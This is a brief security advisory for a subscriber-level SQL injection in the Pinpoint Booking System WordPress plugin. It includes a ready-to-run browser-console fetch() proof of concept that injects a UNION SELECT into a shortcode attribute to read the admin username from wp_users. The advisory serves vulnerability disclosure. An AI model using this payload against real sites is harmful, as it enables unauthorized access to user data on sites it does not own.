Pinpoint Booking System < 2.9.9.2.9 - Subscriber+ SQLi

The plugin does not validate and escape one of its shortcode attributes before using it in a SQL statement, which could allow any authenticated users, such as subscriber to perform SQL Injection attacks.

PoC

Note: A Calendar is needed (if there is not one already). Run the below command in the developer console of the web browser while being on the blog as a subscriber fetch(‘/wp-admin/admin-ajax.php’, { method: ‘POST’, headers: new Headers({ ‘Content-Type’: ‘application/x-www-form-urlencoded’, }), body: ‘action=parse-media-shortcode&shortcode;=[dopbs id='1' lang='en UNION SELECT 100000, CONCAT(“DAY_MONDAY”), “”, “”, user_login COLLATE utf8mb4_unicode_520_ci,“frontend” FROM wp_users WHERE wp_users.ID = 1 –']’ }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log(‘error’, error)); The login of the first user (ie the admin) will be displayed in the calendar data json, within the text[names] attribute.